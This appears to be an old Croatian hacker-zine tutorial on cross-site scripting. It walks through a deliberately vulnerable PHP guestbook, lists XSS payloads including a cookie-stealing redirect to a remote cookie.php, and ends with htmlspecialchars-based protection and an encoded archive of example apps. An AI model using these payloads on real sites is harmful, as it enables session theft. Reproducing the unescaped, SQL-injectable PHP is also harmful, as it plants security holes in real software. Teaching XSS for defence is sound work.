Copy Link
Add to Bookmark
Report

1x05 Cross Site Scripting with examples

eZine's profile picture
Published in 
phearless
 · 11 months ago

 
...................
...::: phearless zine #1 :::...

...............>---[ Cross Site Scripting with examples ]---<...............

..........................>---[ by Exoduks ]---<............................
exoduks[at]gmail[dot]com

SADRZAJ:

[0] Uvod
[1] XSS - Sto je to
[2] Za sto nam je XSS koristan
[3] Dvije najcesce metode XSS napada
[4] Primjeri i exploitovanje
[5] Primjeri korisnog JavaScript koda
[6] Zastita
[7] EOF a.k.a THE END


*** na kraju teksta se nalazi uuencodeovan XSS-examples.tar.gz sa primerima
*** za exploitanje vezanim za ovaj tekst !


////////////////////////////////////////////////////////////////////////////
--==<[ 0. Uvod
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

U ovom tekstu cu vam pisati o Cross Site Scripting propustu u web
aplikacijama. Inace XSS propust je dosta rasiren i programeri premalo pozornosti
posvecuju sigurnosti web aplikacija.
Cross Site Scripting ili skraceno CSS koji mnoge asocira na Cascading
Style Sheet i ako jedno s drugim nemaju nikakve veze. Jos je i poznat pod
nazivom koji se najcesce upotrebljava, a to je XSS koji cu i ja u daljnjem
dijelu koristiti.



////////////////////////////////////////////////////////////////////////////
--==<[ 1. XSS - Sto je to
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

XSS je propust koji se javlja kad neka web aplikacija dobije zlonamjerne
podatke od korisnika, u najcescem slucaju taj zahjtev sadrzi JavaScript,
HTML, VBScript ili neki drugi kod. Jednom kad web aplikacija zaprimi takav
kod prosljeduje ga korisnku gdje njegov web browser izvrsi zlonamjerni kod.



////////////////////////////////////////////////////////////////////////////
--==<[ 2. Za sto nam je XSS koristan
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

XSS je beskoristan ako zlonamjerni kod izvrsi vas browser na vasem
racunalu, jer dobijete vlastite podatke, a to mozete dobiti i bez toga,
stoga se XSS primjenjuje na neku osobu od koje zelite dobiti odredjene
podatke, natjerate da web aplikacija zlonamjerni kod prosljedi njegovom
browseru koji to izvrsava na njegovom racunalu. XSS se najcesce koristi za
dobijanje cookie-a i session-a.



////////////////////////////////////////////////////////////////////////////
--==<[ 3. Dvije najjace metode XSS napada
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Prva metoda je kada korisnik posalje web aplikaciji zlonamjerni kod i
ona ga spremi negdje na serveru (u neku bazu, neki fajl ili nesto trece) i
svaki put kada neki korisnik ucita odredjenu stranicu web aplikacija sa
servera ucitava zlonamjerni kod i salje ga korisniku koji je posjetio tu
stranicu.
Druga metoda je da se "zlonamjerni kod" ne pohranjuje na serveru nego ga
korisnik unosi nekim putem u web aplikaciju i ona mu ga proslijeduje natrag,
te se kod zatim izvrsava.
Prva metoda je korisnija od ove druge jer je laksa za exploitati. U 2-oj
metodi moramo natjerati na neki nacin zrtvu da ona sama unese zlonamjerni
kod koji ce se izvrsiti na zrtvinom racunalu i poslate podatke nama.



////////////////////////////////////////////////////////////////////////////
--==<[ 4. Primjeri i exploitanje
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Kao sto sam vec napomenuo uz ova tekst prilozeni se u primjeri ranjivih
web aplikacija, koje ste trebali vec instalirati. Prvo sa vasim browserom
posjetite:

http://www.server.com/XSS-primjer/index.php

...i pokrenut ce se aplikacija koja ce vam ispisati sadrzaj baze, na ovom
principu rade forumi, razne knjige gostiju, a velik broj njih je ranjiv na
XSS, pogotovo one manje poznate. Nas u ovom dijelu ne zanima kod index.php
stranice pa ga necu objasnjavati.
Kliknite na link koji se nalazi na index.php stranici "Dodaj tekst !"
koji vodi do strance sa formom za unos texta "add.html"(simulacija dodavanja
posta na forumu ili knjigi gostiju). Na toj stranici za pocetak cemo unijeti
pod naslov "Proba", a pod tekst "Blabalbal" nakon unosa pritisnite submit.
Nakon toga trebalo bi vam se pojaviti Uspjesno dodano. Zatim opet posjetite
"index.php" na kojoj cete vidjeti text koji ste unijeli preko forme.

Zatim otvorite add.php i pogledajte sljedeci kod:

------- star code -------
<?php
include("config.php");

$naslov = $_POST['naslov'];
$text = $_POST['text'];

mysql_connect($server, $dbuser, $dbpass);
mysql_select_db($database) or die("Greska u spajanju na bazu !");

$query = "INSERT INTO XSS_primjer1 VALUES ('$naslov', '$text')";
mysql_query($query);
mysql_close();

echo "Dodano u bazu !";

?>
------- end code -------

Idemo sad malo razjasniti kod:

...
include("config.php");
...
- ukljucuje se fajl config.php u kojem su smjesteni podaci za spajanje na
bazu.


...
$naslov = $_POST['naslov'];
$text = $_POST['text'];
...
- ove dvije varijable hvataju POST zahtjev od add.html forme, posto nema
nikakve provjere za sadrzajem tih dviju varijabli mozemo bez problema
unijeti zlonmajerni kod, kao sto cete vidjeti sami.


...
mysql_connect($server, $dbuser, $dbpass);
mysql_select_db($database) or die("Greska u spajanju na bazu !");

$query = "INSERT INTO XSS_primjer1 VALUES ('$naslov', '$text')";
mysql_query($query);
mysql_close();

echo "Dodano u bazu !";
...
- funkcije za spajanje na bazu i dodavanje sadrzaja varijabli $naslov i
$text u bazu, ali taj dio i nije toliko vazan.


Znaci koliko vidimo iz gornjeg koda nema provjere ulaznih varijabli $naslov
i $text stoga je XSS napad moguc pa idemo da vidiom i to.


- sa browserom posjetite add.html i u polje naslov stavite "proba - xss"
a pod text stavite sljedeci JavaScript kod:

<script>alert('XSS primjer 1 - exploited !');</script>

- nakon sto ste unijeli kliknite na submit i zatim ponovno otidite na
index.php stranicu.

- odmah nakon sto se stranica ucita iskocit ce vam prozor sa porukem "XSS
primjer 1 - exploited !"

- kao sto smo i predpostavili moguce je unijeti kod i sremiti ga u bazu te
ce se izvrsiti na svim korisncima koji posjete tu stranicu.



////////////////////////////////////////////////////////////////////////////
--==<[ 5. Primjeri korisnog JavaScript koda
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

<script>alert('Lamed !');</script>

<script>alert(document.cookie);</script>

<script>document.location='http://server/cookie.php?'+document.cookie</script>

<IMG SRC="javascript:alert('Lamed!');">

<BODY BACKGROUND="javascript:alert('Lamed !')">

<LINK REL="stylesheet" HREF="javascript:alert('Lamed !');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('Lamed !');">

<BODY ONLOAD=alert('Lamed !')>



////////////////////////////////////////////////////////////////////////////
--==<[ 6. Zastita
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Najbolja zastita protiv XSS napada je da se filtriraju sve ulazne
varijable. To se moze uciniti putem gotovih funkcija ili mozete napisati
neke provjere da li varijabla sadrzi npr. "script", i tagove <> !
Evo vam nekih funkcija u php-u koje se za to koriste, najcesce u kombinaciji
s nekom drugom funkcijom drugom:

// from php menual

eregi_replace -- Replace regular expression case insensitive
This function is identical to ereg_replace()
except that this ignores case distinction when
matching alphabetic characters.

htmlspecialchars -- Convert special characters to HTML entities
This function is useful in preventing user-supplied
text from containing HTML markup, such as in a message
board or guest book application.

Idemo vidjeti sto bi se dogodilo da u kod od add.php jos dodamo sljdeci kod:

Ispod:
...
$naslov = $_POST['naslov'];
$text = $_POST['text'];
...

Dodamo jos:
...
$naslov = htmlspecialchars($naslov);
$text = htmlspecialchars($text);
...

Idemo sada vidjeti sto ce se dogoditi ako opet u aplikaciju unesemo javascript
kod. Posjetite http://www.server.com/XSS-primjer/add.html i unesite i pod Naslovi
pod Tekst <script>alert('XSS primjer 1 - exploited !');</script>. Zatim kliknite
na submit. Primjetit cete da nam nace iskociti prozor nego ce nam se javascript kod
koji smo unijeli ispisati ali se nece izvrsiti.



////////////////////////////////////////////////////////////////////////////
--==<[ 7. EOF a.k.a THE END
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Dosli ste na kraj ovog teksta koji je trebao biti malo duzi ali zbog
pozurivanja :) morao sam to malo skratiti. Pozdravljam sve koje poznam :)
neda mi se pisati sada listu ! Nemojte zamjeriti na gramatickim greskama.
BTW. posjetite www.hackgen.org !



begin 644 xss-examples.tar.gz
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
0AH:&QC>)_P$@-@#I`'@`````
`
end
sum -r/size 19780/2401

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT